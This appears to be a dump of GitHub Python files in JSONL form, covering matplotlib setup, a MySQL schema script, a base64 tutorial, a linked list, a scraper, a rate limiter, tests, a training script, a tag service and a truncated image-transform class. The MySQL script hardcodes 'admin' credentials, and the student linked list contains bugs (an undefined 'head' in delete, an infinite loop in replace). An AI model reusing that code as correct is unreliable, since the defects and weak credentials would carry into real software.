print('[pt] current backend is: %r' % current_backend)\n print('[pt] mpl.use(%r)' % target_backend)\n if current_backend != target_backend:\n _mpl_set_backend(target_backend)\n _init_mpl_rcparams()\n\n\n@profile\ndef init_matplotlib(verbose=VERBOSE_MPLINIT):\n if ut.in_main_process():\n PyQt, pyqt_version = get_pyqt()\n return _init_mpl_mainprocess(verbose=verbose)\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/plottool/__MPL_INIT__.py","file_name":"__MPL_INIT__.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"71229715449","text":"import mysql.connector\n\n'''\nDatabase creation in MySQL, Table creation in database named XML \n'''\n\ndb_connection = mysql.connector.connect(\n host=\"localhost\",\n user=\"admin\",\n password=\"admin\"\n)\n\ndb_cursor = db_connection.cursor()\ncreate_database_query = \"CREATE DATABASE IF NOT EXISTS XML\"\ndb_cursor.execute(create_database_query)\n\n# Table creation in XML database\ndb_cursor.execute(\"USE XML\")\n\ncreate_transaction_table_query = \"\"\"\nCREATE TABLE IF NOT EXISTS Transaction (\n TransactionID VARCHAR(255) PRIMARY KEY,\n BeginDateTime DATETIME,\n EndDateTime DATETIME\n)\n\"\"\"\ndb_cursor.execute(create_transaction_table_query)\n\n# Creating the 'RetailTransactions' table with a foreign key constraint on TransactionID\ncreate_table_query = \"\"\"\nCREATE TABLE IF NOT EXISTS RetailTransactions (\n Date DATETIME,\n StoreID INT,\n TotalItems DECIMAL(10, 2),\n TotalAmount DECIMAL(10, 2),\n TotalReceipts DECIMAL(10, 2),\n TransactionID VARCHAR(255),\n FOREIGN KEY (TransactionID) REFERENCES Transaction(TransactionID)\n)\n\"\"\"\ndb_cursor.execute(create_table_query)\n\ndb_cursor.close()\ndb_connection.close()\n","repo_name":"Pociejus/RelyITS_exercise","sub_path":"Create_DB.py","file_name":"Create_DB.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26832176314","text":"# base64 => 由大写字母,小写字母,数字0-9,以及/和+组成 -> 64个符号\n# base64 把字节变成字符串 把字符串还原成字节\n# base64处理的时候,三个字节一起处理 -> 处理成4个字符\n# base64处理后的字节 会比原来大一点点\n\nimport base64\n\ns = \"我爱你\"\n# 转化成字节\nbs = s.encode(\"utf-8\")\nprint(bs)\n# 转成成base64字符串\nb64_str = base64.b64encode(bs).decode()\n# b64_str = b64_str.decode() # 这里是Unicode编码,不需要encoding\nprint(b64_str)\n\n# 如果有了b64字符串,还原字节\ns = \"5oiR54ix5L2g\"\nbs = base64.b64decode(s)\nprint(bs)\n\n# base64的字符串本质是什么? 字节\n# 所有的告诫加密逻辑里,大部分都是字节\n","repo_name":"wanghuiyt/LuffyCode","sub_path":"四期直播/18.JS逆向/6.聊聊base64.py","file_name":"6.聊聊base64.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29804747427","text":"class Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def __repr__(self):\n \"\"\"Return a string representation of this node.\"\"\"\n return 'Node({!r})'.format(self.data)\n\nclass LinkedList(object):\n \"\"\"Initialize this linked list and append the given items, if any.\"\"\"\n def __init__(self, items=None):\n self.head = None\n self.tail = None\n if items is not None:\n for item in items:\n self.append(item)\n\n def __str__(self):\n \"\"\"Return a formatted string representation of this linked list.\"\"\"\n items = ['({!r})'.format(item) for item in self.items()]\n return '[{}]'.format(' -> '.join(items))\n\n def __repr__(self):\n \"\"\"Return a string representation of this linked list.\"\"\"\n return 'LinkedList({!r})'.format(self.items())\n\n def items(self):\n \"\"\"Return a list (dynamic array) of all items in this linked list.\n Best and worst case running time: O(n) for n items in the list (length)\n because we always need to loop through all n nodes to get each item.\"\"\"\n items = [] # O(1) time to create empty list\n # Start at head node\n node = self.head # O(1) time to assign new variable\n # Loop until node is None, which is one node too far past tail\n while node is not None: # Always n iterations because no early return\n items.append(node.data) # O(1) time (on average) to append to list\n # Skip to next node to advance forward in linked list\n node = node.next # O(1) time to reassign variable\n # Now list contains items from all nodes\n return items # O(1) time to return list\n\n def is_empty(self):\n \"\"\"Return a boolean indicating whether this linked list is empty.\"\"\"\n return self.head is None\n\n def append(self,data):\n \"\"\"Add Node with data to the end of linked list and set to tail\"\"\"\n # setting tail and head \n if self.is_empty():\n self.head = self.tail = Node(data)\n print('added head')\n return True\n else:\n curr = self.head\n while curr.next:\n curr = curr.next\n self.tail = curr.next = Node(data)\n \n def prepend(self,data):\n \"\"\"Add Node to begining of Linkelist. Set it to head\"\"\"\n if self.head == None:\n self.head = Node(data)\n self.tail = self.head\n else:\n curr = self.head\n new = Node(data)\n new.next = curr\n curr.prev = new\n self.head = new\n\n def replace(self,item, quality):\n if self.head:\n curr = self.head\n while curr:\n if quality(curr.data):\n curr.data = item\n else:\n curr = curr.next\n else:\n return None\n \n\n def find(self, quality):\n curr = self.head\n if curr != None:\n while curr:\n if quality(curr.data):\n print(\"found {} at {}\".format(curr.data, curr))\n return curr.data\n else:\n curr = curr.next\n else:\n print(\"not found\")\n return None\n\n \n\n def delete(self,item):\n \"\"\"Delete a node based on it's data value\"\"\"\n #Delete first node\n if self.head:\n prev = self.head\n if head.data == item:\n self.head = head.next\n #The other nodes\n else:\n prev = self.head\n curr = prev.next\n while curr.next:\n print(\"prev {} , cur {}\".format(prev.data, curr.data))\n if curr.data == item:\n prev.next = curr.next\n return \"deleted {}\".format(curr)\n else:\n prev = prev.next\n curr = prev.next\n print(curr.data)\n print(prev.data)\n if curr.data == item:\n self.tail = prev \n prev.next = None\n else:\n print(\"{} is not in the linkedlist\".format(item))\n return ValueError\n else:\n return ValueError\n\n def get_node(self, index):\n \"\"\"(ABstract). Get element based on index.\"\"\"\n if self.is_empty():\n return -1\n else:\n if index == 0:\n return self.head\n else:\n x = 0\n curr = self.head\n while x < index:\n if curr.next != None:\n print(curr.data)\n curr = curr.next\n x+=1\n else:\n print(\"index out of bounds\")\n return -2\n print(curr.data)\n return curr\n\n\n def length(self):\n \"\"\"Return the legth of the code\"\"\"\n idx = 1\n if self.head == None:\n return 0\n else:\n curr = self.head\n while curr.next:\n curr = curr.next\n idx +=1\n return idx\n\n def __str__(self):\n \"\"\"Return a formatted string representation of this linked list.\"\"\"\n items = ['({!r})'.format(item) for item in self.items()]\n return '[{}]'.format(' -> '.join(items))\n\n def __repr__(self):\n \"\"\"Return a string representation of this linked list.\"\"\"\n return 'LinkedList({!r})'.format(self.items())\n\ndef test_linked_list():\n ll = LinkedList()\n print('list: {}'.format(ll))\n\n print('\\nTesting append:')\n for item in ['A', 'B', 'C']:\n print('append({!r})'.format(item))\n ll.append(item)\n print('list: {}'.format(ll))\n\n print('head: {}'.format(ll.head))\n print('tail: {}'.format(ll.tail))\n print('length: {}'.format(ll.length()))\n\n # Enable this after implementing delete method\n delete_implemented = True\n if delete_implemented:\n print('\\nTesting delete:')\n for item in ['B', 'C', 'A']:\n print('delete({!r})'.format(item))\n ll.delete(item)\n print('list: {}'.format(ll))\n\n print('head: {}'.format(ll.head))\n print('tail: {}'.format(ll.tail))\n print('length: {}'.format(ll.length()))\n\n\nif __name__ == '__main__':\n test_linked_list()\n","repo_name":"ajboxjr/Tweet-Generator","sub_path":"class7/data-structure/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71776826810","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport os\n\n\nurl=\"https://www.yellowpages.com/search?search_terms=event+planners&geo_location_terms=Los+Angeles%2C+CA\"\nurl2=\"https://www.yellowpages.com/search?search_terms=event+planners&geo_location_terms=\"\nurl3=\"https://www.yellowpages.com/search?search_terms=event%20planners&geo_location_terms=\"\nheaders={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\"\n}\n#req=requests.get(url,headers=headers)\n# print(req.status_code)\n# print(req.request.headers)\n\nname=input(\"Enter the locationn name:\").replace(\" \",\"+\")\nstate=input(\"Enter the state abbreviation: \").upper()\n\nos.chdir(\"D:\\Python\\Web Scraping\\Yellow Pages Scrape\")\n\ninfo=pd.DataFrame()\n\npages=int(input(\"Enter the number of pages you want to extract: \"))\nlink=None\ncount=0\nfor i in range(1,pages+1):\n try:\n if i>1:\n holding=[x+\"%20\" for x in name.split(\"+\")]\n first=\"\".join(holding[0:len(holding)-1])\n last=holding[len(holding)-1].split('%20')[0]+'%2C'+'%20'+state+\"&page=\"+str(i)\n link=url3+first+last\n #print(link)\n else:\n link=url2+name+\"%2C\"+\"+\"+state\n #print(link)\n except:\n print(\"Error has occured\")\n \n req=requests.get(link,headers=headers)\n soup=BeautifulSoup(req.content,features=\"lxml\")\n try:\n #container=soup.find(\"div\",{\"class\":\"search-results organic\"})\n another=soup.find_all(\"div\",{\"class\":\"result\"})\n for sections in another:\n business_name=sections.find(\"a\",{\"class\":\"business-name\"}).text\n #print(business_name)\n category=sections.find(\"div\",{\"class\":\"categories\"}).a.text\n #print(category)\n business_years=sections.find(\"div\",{\"class\":\"years-in-business\"})\n if business_years!=None:\n business_years=business_years.text\n #print(business_years)\n else:\n business_years=\"None\"\n phone_no=sections.find(\"div\",{\"class\":\"info-section info-secondary\"}).div.text\n if phone_no==None:\n phone_no=\"None\"\n #count+=1\n info.loc[len(info),['Name', 'Contact', 'Category', 'Years in Business']] = [business_name, phone_no, category,business_years]\n except:\n print(\"Error when assigning value\")\n\n#print(\"Total count:\",count)\ninfo.to_csv(f'{name}.csv')\n \n\n\n \n ","repo_name":"kaziabdullahfuad/The-Yellow-Pages-Scrape","sub_path":"my_yellowscrape.py","file_name":"my_yellowscrape.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21347688706","text":"# Given a string S, remove the vowels 'a', 'e', 'i', 'o', and 'u' from it, and return the new string.\n# S consists of lowercase English letters only.\n# 1 <= S.length <= 1000\n\nclass Solution:\n def removeVowels(self, S: str) -> str:\n if len(S)==0:\n return S\n vowels=['a', 'e', 'i', 'o', 'u']\n for i in vowels:\n S = S.replace(i,'')\n \n return S\n \n # List all the lowercase vowels. Loop each item of these five vowels, if any item matches the exist vowels in the string, \n # replace them with empty element.\n \n # Runtime: 24 ms, faster than 85.71% of Python3 online submissions.\n # Memory Usage: 12.7 MB, less than 100.00% of Python3 online.\n","repo_name":"BaronMa/Leetcode","sub_path":"Algorithms/Remove Vowels from a String.py","file_name":"Remove Vowels from a String.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18590470985","text":"from __future__ import absolute_import\n\nimport logging\n\nfrom flask import Blueprint, request, abort\n\nfrom huskar_api import settings\nfrom huskar_api.extras.rate_limiter import (\n check_new_request, RateExceededError)\nfrom huskar_api.switch import switch, SWITCH_ENABLE_RATE_LIMITER\n\n\nbp = Blueprint('middlewares.rate_limit_ip', __name__)\nlogger = logging.getLogger(__name__)\n\n\n@bp.before_app_request\ndef check_rate_limit():\n if not switch.is_switched_on(SWITCH_ENABLE_RATE_LIMITER):\n return\n\n remote_addr = request.remote_addr\n config = get_limiter_config(settings.RATE_LIMITER_SETTINGS, remote_addr)\n if not config:\n return\n\n rate, capacity = config['rate'], config['capacity']\n try:\n check_new_request(remote_addr, rate, capacity)\n except RateExceededError:\n abort(429, 'Too Many Requests, the rate limit is {}/s'.format(rate))\n\n\ndef get_limiter_config(configs, remote_addr):\n if remote_addr in configs:\n return configs[remote_addr]\n if '__anonymous__' in configs:\n return configs['__anonymous__']\n return configs.get('__default__')\n","repo_name":"huskar-org/huskar","sub_path":"huskar_api/api/middlewares/rate_limit_ip.py","file_name":"rate_limit_ip.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"77"} +{"seq_id":"31863522838","text":"import os\nimport tempfile\nimport unittest\nfrom Bio import MissingExternalDependencyError\n\nimport Bio.Phylo as bp\nfrom Bio.Phylo import CDAO\n\ntry:\n from Bio.Phylo import CDAOIO\nexcept ImportError:\n raise MissingExternalDependencyError(\n \"Install RDFlib if you want to use the CDAO tree format.\"\n ) from None\n\n# Example CDAO files\ncdao_files = (\"test.cdao\",)\n\n# Temporary file name for Writer tests below\nDUMMY = tempfile.NamedTemporaryFile(delete=False).name\n\n\n# ---------------------------------------------------------\n# Parser tests\n\n\ndef _test_parse_factory(source):\n \"\"\"Generate a test method for parse()ing the given source.\n\n The generated function extracts each phylogenetic tree using the parse()\n function.\n \"\"\"\n filename = os.path.join(\"CDAO/\", source)\n\n def test_parse(self):\n trees = list(bp._io.parse(filename, \"cdao\"))\n\n test_parse.__doc__ = f\"Parse the phylogenies in {source}.\"\n return test_parse\n\n\ndef _test_write_factory(source):\n \"\"\"Test for serialization of objects to CDAO format.\n\n Modifies the globally defined filenames in order to run the other parser\n tests on files (re)generated by CDAOIO's own writer.\n \"\"\"\n filename = os.path.join(\"CDAO/\", source)\n\n def test_write(self):\n \"\"\"Parse, rewrite and retest an example file.\"\"\"\n with open(filename) as infile:\n t1 = next(CDAOIO.Parser(infile).parse())\n\n with open(DUMMY, \"w\") as outfile:\n CDAOIO.write([t1], outfile)\n with open(DUMMY) as infile:\n t2 = next(CDAOIO.Parser(infile).parse())\n\n for prop_name in (\"name\", \"branch_length\", \"confidence\"):\n p1 = [getattr(n, prop_name) for n in t1.get_terminals()]\n p2 = [getattr(n, prop_name) for n in t2.get_terminals()]\n if p1 == p2:\n pass\n else:\n # Can't sort lists with None on Python 3 ...\n self.assertNotIn(None, p1, f\"Bad input values for {prop_name}: {p1!r}\")\n self.assertNotIn(None, p2, f\"Bad output values for {prop_name}: {p2!r}\")\n self.assertEqual(sorted(p1), sorted(p2))\n\n test_write.__doc__ = f\"Write and re-parse the phylogenies in {source}.\"\n return test_write\n\n\nclass ParseTests(unittest.TestCase):\n \"\"\"Tests for proper parsing of example CDAO files.\"\"\"\n\n\nfor n, ex in enumerate(cdao_files):\n parse_test = _test_parse_factory(ex)\n parse_test.__name__ = f\"test_parse_{n}\"\n setattr(ParseTests, parse_test.__name__, parse_test)\n\n\nclass WriterTests(unittest.TestCase):\n pass\n\n\nfor n, ex in enumerate(cdao_files):\n write_test = _test_write_factory(ex)\n write_test.__name__ = f\"test_write_{n}\"\n setattr(WriterTests, write_test.__name__, write_test)\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity=2)\n unittest.main(testRunner=runner)\n # Clean up the temporary file\n if os.path.exists(DUMMY):\n os.remove(DUMMY)\n","repo_name":"biopython/biopython","sub_path":"Tests/test_Phylo_CDAO.py","file_name":"test_Phylo_CDAO.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"4183581432","text":"from data import DataLoader,BatchX\nfrom match import PIXNETNET\nimport pickle as pkl\nfrom train import Trainer,loss_function\nfrom torch import optim\nfrom evaluate import Evaluator\nimport os,argparse\nimport torch\n# load configuration\n# load data\n# build model\n# train\n# evaluate\n# save restore\n\n\ndef parse():\n parser = argparse.ArgumentParser(description='PIXNET...')\n\n\n parser.add_argument('mode',default=\"test\")\n parser.add_argument('-bs', '--batch_size', help='generate data',default=64,type=int)\n parser.add_argument('-en', '--epoch_num', help='generate data',default=100,type=int)\n parser.add_argument('-cpp', '--checkpoint_path', help='generate data',default=None)\n \n parser.add_argument('-lr', '--lr',default=None)\n\n # for decoding\n parser.add_argument('-r','--save_root',default='./tmp')\n\n #training path\n parser.add_argument('-tp','--train_path',default='20.txt')\n parser.add_argument('-vp','--val_path',default='20.txt')\n parser.add_argument('-ep','--eval_path',default='20.txt')\n\n parser.add_argument('-voc','--voc_path',default=None)\n \n args = parser.parse_args()\n return args\nprint('start')\narg = parse()\nprint('mode is %s'%(arg.mode))\n\nbatch_size = arg.batch_size\nepoch_num = arg.epoch_num\nsave_root_dir = arg.save_root\nif not os.path.exists(save_root_dir):\n os.makedirs(save_root_dir)\n\n#if arg.mode == 'test':\n# assert arg.voc_path is not None\n\nvocab = None\nif arg.voc_path is not None:\n with open(arg.voc_path,'rb') as f:\n vocab = pkl.load(f)\n\nif arg.mode == 'train':\n train_loader = DataLoader(vocab)\n train_loader.load_all(arg.train_path,batch_size)\n train_batch = train_loader.batch_data \n vocab = train_loader.vocab\n val_loader = DataLoader(vocab)\n val_loader.load_all(arg.val_path,batch_size)\n val_batch = val_loader.batch_data \n#elif arg.mode == 'test':\n# eval_loader = DataLoader(vocab)\n# eval_loader.load_all(arg.eval_path,batch_size)\n# eval_batch = eval_loader.batch_data \n# vocab = eval_loader.vocab\n\nembedding_dim,title_gru_units,response_gru_units = 200,128,256\nhyper_parameters = (vocab,embedding_dim,title_gru_units,\\\n response_gru_units) \n\nif arg.checkpoint_path is not None:\n checkpoint = torch.load(arg.checkpoint_path)\n if 'model_hyper' in checkpoint:\n hyper_parameters = checkpoint['model_hyper']\n net = PIXNETNET(*hyper_parameters)\n net.load_state_dict(checkpoint['model'])\n optimizer = optim.Adam(net.parameters())\n optimizer.load_state_dict(checkpoint['optimzer'])\nelse:\n net = PIXNETNET(*hyper_parameters)\n if arg.lr is not None:\n optimizer = optim.Adam(net.parameters(),lr=arg.lr)\n else:\n optimizer = optim.Adam(net.parameters())\n\ndef get_X_y(batch_data):\n batch_label,batch_title,batch_comment = batch_data\n X = BatchX(batch_title,batch_comment)\n y = batch_label\n return X,y\n\nif arg.mode == 'train':\n train_X,train_y = get_X_y(train_batch)\n val_X,val_y = get_X_y(val_batch)\n\n trainer = Trainer(net,optimizer)\n trainer.train(epoch_num,train_X,train_y ,val_X,val_y,save_every = 10,\\\n save_dir='%s/model'%(save_root_dir),evaluate_every=10)\n#elif arg.mode == 'test':\n# print('evaluate form %s'%(arg.eval_path))\n# eva_X,eva_y = get_X_y(eval_batch)\n# evaluator = Evaluator(net)\n# loss,accu = evaluator.evaluate(eva_X,eva_y,loss_function)\n# print('loss,accu --> (%.3f %.3f)'%(loss,accu))\n","repo_name":"kumiko-oreyome/DISA_FINAL_PIXNET_PROJECT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15993692867","text":"from sqlalchemy import or_\nfrom flask import current_app\n\nfrom models import db\nfrom models.companies import Companies\nfrom validators.company import CompanyPostSchema, CompanyDeleteSchema\nfrom utils.common import tag_converter\n\n\nclass CompanyInternalService(object):\n \"\"\"\n Company Internal Service Logic Class\n -> CompanyInternalService(compnay_name, tags)\n \"\"\"\n def __init__(self, param: dict = None, body: dict = None):\n self._param = param\n self._body = body\n\n def __repr__(self):\n return f\"self._param : {self._param} self._body : {self._body}\"\n\n def validate_param(self) -> (bool, bool):\n \"\"\"\n Validate [DELETE] /company/tags query string value\n :return: boolean\n \"\"\"\n try:\n error = CompanyDeleteSchema().validate(data=self._param)\n if error:\n raise ValueError(error)\n\n except ValueError as e:\n current_app.logger.error(e)\n return False, e\n\n return True, True\n\n def validate_body(self) -> (bool, bool):\n \"\"\"\n Validate [POST] /company/tags body value\n :return: boolean\n \"\"\"\n try:\n error = CompanyPostSchema().validate(data=self._body)\n if error:\n raise ValueError(error)\n\n except ValueError as e:\n current_app.logger.error(e)\n return False, e\n\n return True, True\n\n def has_company_tags(self, company_name: str, company_tag: str) -> (bool or None, bool):\n \"\"\"\n check company has request tag name in database\n :return: boolean (True, False)\n \"\"\"\n\n try:\n row = Companies.query.filter(or_(Companies.company_ko == company_name,\n Companies.company_en == company_name,\n Companies.company_ja == company_name)).first()\n if not row:\n return None, None\n\n # Set ko, ja, en tags\n tags = row.tag_ko.split(\"|\") + row.tag_en.split(\"|\") + row.tag_ja.split(\"|\")\n\n # Already Exist tag\n if company_tag in tags:\n return True, True\n\n except Exception as e:\n current_app.logger.error(e)\n\n return False, True\n\n def create_company_tags(self) -> (bool or None, str):\n \"\"\"\n create company tags\n :return: bool or None\n \"\"\"\n session = db.session()\n\n try:\n company_name = self._body.get(\"company_name\")\n company_tag = self._body.get(\"company_tag\")\n\n result, code = self.has_company_tags(company_name=company_name, company_tag=company_tag)\n\n # There is no request body company name in database\n if result is None:\n return None, \"EMPTY\"\n\n # Already company has request body company tag\n if result is True and code is True:\n return None, \"ALREADY_EXIST\"\n\n result, tags = tag_converter(tag=company_tag)\n\n if not result:\n raise ValueError(tags)\n\n # select row\n row = session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)).first()\n\n tag_ko = \"|\".join(row.tag_ko.split(\"|\") + [tags[\"ko\"]]) if row.tag_ko else tags[\"ko\"]\n tag_ja = \"|\".join(row.tag_ja.split(\"|\") + [tags[\"ja\"]]) if row.tag_ja else tags[\"ja\"]\n tag_en = \"|\".join(row.tag_en.split(\"|\") + [tags[\"en\"]]) if row.tag_en else tags[\"en\"]\n\n # update row\n session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name))\\\n .update({\n \"tag_ko\": tag_ko,\n \"tag_ja\": tag_ja,\n \"tag_en\": tag_en\n })\n\n except Exception as e:\n current_app.logger.error(e)\n session.rollback()\n return False, \"BAD_REQUEST\"\n\n session.commit()\n session.close()\n return True, \"SUCCESS\"\n\n def delete_company_tags(self) -> (bool or None, str):\n \"\"\"\n delete company tags\n :return: bool, String\n \"\"\"\n session = db.session()\n\n try:\n company_name = self._param.get(\"company_name\")\n company_tag = self._param.get(\"company_tag\")\n\n result, code = self.has_company_tags(company_name=company_name, company_tag=company_tag)\n\n if result is None:\n return None, \"EMPTY\"\n\n if result is False and code is True:\n return None, \"ALREADY_NOT_EXIST\"\n\n result, tags = tag_converter(tag=company_tag)\n\n if not result:\n raise ValueError(tags)\n\n row = session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)).first()\n\n tag_ko = \"|\".join(sorted(set(row.tag_ko.split(\"|\")) - {tags[\"ko\"]})) if row.tag_ko else tags[\"ko\"]\n tag_ja = \"|\".join(sorted(set(row.tag_ja.split(\"|\")) - {tags[\"ja\"]})) if row.tag_ja else tags[\"ja\"]\n tag_en = \"|\".join(sorted(set(row.tag_en.split(\"|\")) - {tags[\"en\"]})) if row.tag_en else tags[\"en\"]\n\n # update row\n session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)) \\\n .update({\n \"tag_ko\": tag_ko,\n \"tag_ja\": tag_ja,\n \"tag_en\": tag_en\n })\n\n except Exception as e:\n current_app.logger.error(e)\n session.rollback()\n return False, \"BAD_REQUEST\"\n\n session.commit()\n session.close()\n return True, \"SUCCESS\"","repo_name":"JeongHM/wants","sub_path":"services/internals/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13750284048","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"*imtransform - transformations such as rotate and flip*.\"\"\"\n\nimport functools\nimport math\nfrom typing import Optional\n\nfrom vimiv.qt.core import Qt, QRect, QSize, QObject, Signal\nfrom vimiv.qt.gui import QTransform, QPixmap\n\nfrom vimiv import api\nfrom vimiv.utils import log\n\n\n_logger = log.module_logger(__name__)\n\n\ndef register_transform_command(**kwargs):\n \"\"\"Wrap commands.register to ensure image is editable and apply transformations.\"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def inner(self, *args, **kwargs):\n # Only used to wrap methods of transform\n # pylint: disable=protected-access\n self._ensure_editable()\n func(self, *args, **kwargs)\n self.apply()\n\n return api.commands.register(mode=api.modes.IMAGE, edit=True, **kwargs)(inner)\n\n return decorator\n\n\nclass Transform(QTransform):\n \"\"\"Apply transformations to an image.\n\n Provides the commands related to transformation such as rotate and flip and is used\n to apply these transformations to the pixmap given by the handler.\n\n Attributes:\n _current: Class to access the currently displayed pixmap.\n _original: The original, untransformed, pixmap.\n\n Signals:\n transformed: Emitted with the transformed pixmap upon changes.\n \"\"\"\n\n class Signals(QObject):\n \"\"\"Signals for transformed required as QTransform is not a QObject.\"\"\"\n\n transformed = Signal(QPixmap)\n\n _signals = Signals()\n transformed = _signals.transformed\n\n @api.objreg.register\n def __init__(self, current_pixmap):\n super().__init__()\n self._current = current_pixmap\n self._original = None\n\n @property\n def current(self):\n return self._current.pixmap\n\n @property\n def original(self):\n return self._original\n\n @original.setter\n def original(self, pixmap):\n self._original = pixmap\n self.reset()\n\n @property\n def angle(self) -> float:\n \"\"\"Current rotation angle in degrees.\"\"\"\n x, y = self.map(1.0, 0.0)\n return (math.atan2(y, x) / math.pi * 180) % 360\n\n @api.keybindings.register(\"<\", \"rotate --counter-clockwise\", mode=api.modes.IMAGE)\n @api.keybindings.register(\">\", \"rotate\", mode=api.modes.IMAGE)\n @register_transform_command(name=\"rotate\")\n def rotate_command(self, counter_clockwise: bool = False, count: int = 1):\n \"\"\"Rotate the image.\n\n **syntax:** ``:rotate [--counter-clockwise]``\n\n optional arguments:\n * ``--counter-clockwise``: Rotate counter clockwise.\n\n **count:** multiplier\n \"\"\"\n angle = 90 * count\n self.rotate(-angle if counter_clockwise else angle)\n\n @api.keybindings.register(\"_\", \"flip --vertical\", mode=api.modes.IMAGE)\n @api.keybindings.register(\"|\", \"flip\", mode=api.modes.IMAGE)\n @register_transform_command()\n def flip(self, vertical: bool = False):\n \"\"\"Flip the image.\n\n **syntax:** ``:flip [--vertical]``\n\n optional arguments:\n * ``--vertical``: Flip image vertically instead of horizontally.\n \"\"\"\n # Change direction if image is rotated by 90/270 degrees\n if self.angle % 180:\n vertical = not vertical\n if vertical:\n self.scale(1, -1)\n else:\n self.scale(-1, 1)\n\n @register_transform_command()\n def resize(self, width: int, height: Optional[int]):\n \"\"\"Resize the original image to a new size.\n\n **syntax:** ``:resize width [height]``\n\n positional arguments:\n * ``width``: Width in pixels to resize the image to.\n * ``height``: Height in pixels to resize the image to. If not given, the\n aspectratio is preserved.\n \"\"\"\n dx = width / self.current.width()\n dy = dx if height is None else height / self.current.height()\n self.scale(dx, dy)\n\n @register_transform_command()\n def rescale(self, dx: float, dy: Optional[float]):\n \"\"\"Rescale the original image to a new size.\n\n **syntax:** ``:rescale dx [dy]``\n\n positional arguments:\n * ``dx``: Factor in x direction to scale the image by.\n * ``dy``: Factor in y direction to scale the image by. If not given, the\n aspectratio is preserved.\n \"\"\"\n dy = dy if dy is not None else dx\n self.scale(dx, dy)\n\n def apply(self):\n \"\"\"Apply all transformations to the original pixmap.\"\"\"\n self._apply(\n self.original.transformed(\n self, mode=Qt.TransformationMode.SmoothTransformation\n )\n )\n\n def straighten(self, *, angle: int, original_size: QSize):\n \"\"\"Straighten the original image.\n\n This rotates the image by the total angle and crops the valid, axis-aligned\n rectangle from the rotated image.\n\n Args:\n angle: Rotation angle to straighten the original image by.\n original_size: Size of the original unstraightened image.\n \"\"\"\n self.rotate(angle)\n transformed = self.original.transformed(\n self, mode=Qt.TransformationMode.SmoothTransformation\n )\n rect = self.largest_rect_in_rotated(\n original=original_size, rotated=transformed.size(), angle=angle\n )\n self._apply(transformed.copy(rect))\n\n def crop(self, rect):\n self._apply(self.current.copy(rect))\n\n def _apply(self, transformed):\n \"\"\"Check the transformed pixmap for validity and apply it to the handler.\"\"\"\n if transformed.isNull():\n raise api.commands.CommandError(\n \"Error transforming image, ignoring transformation.\\n\"\n \"Is the resulting image too large? Zero?.\"\n )\n self.transformed.emit(transformed)\n\n def _ensure_editable(self):\n if not self._current.editable:\n raise api.commands.CommandError(\"File format does not support transform\")\n\n @property\n def changed(self):\n \"\"\"True if transformations have been applied.\"\"\"\n if self.current.rect().isNull():\n return False\n transformed = not self.isIdentity()\n if self._original is None:\n return transformed\n cropped = self.current.rect() != self._original.rect()\n return transformed or cropped\n\n @property\n def matrix(self):\n \"\"\"Tuple of matrix elements defining the current transformation matrix.\"\"\"\n # fmt: off\n return (\n self.m11(), self.m12(), self.m13(),\n self.m21(), self.m22(), self.m23(),\n self.m31(), self.m32(), self.m33(),\n )\n # fmt: on\n\n @property\n def size(self) -> QSize:\n \"\"\"Size of the transformed image.\"\"\"\n return self.current.size()\n\n @register_transform_command()\n def undo_transformations(self):\n \"\"\"Undo any transformation applied to the current image.\"\"\"\n self.reset()\n self.transformed.emit(self.original)\n\n @classmethod\n def largest_rect_in_rotated(\n cls, *, original: QSize, rotated: QSize, angle: float\n ) -> QRect:\n \"\"\"Return largest possible axis-aligned rectangle in rotated rectangle.\n\n See https://stackoverflow.com/a/16778797 for the implementation details.\n\n Args:\n original: Size of the original (unrotated) rectangle.\n rotated: Size of the rotated and padded rectangle (larger than original).\n angle: Rotation angle in degrees.\n Returns:\n Rectangle with the coordinates and size within the rotated rectangle.\n \"\"\"\n # Not beautiful, but also not much nicer if we refactor this into multiple\n # functions\n # pylint: disable=too-many-locals\n rad = angle / 180 * math.pi\n is_portrait = original.height() > original.width()\n short = original.width() if is_portrait else original.height()\n long = original.height() if is_portrait else original.width()\n sin_a = abs(math.sin(rad))\n cos_a = abs(math.cos(rad))\n\n if short <= 2.0 * 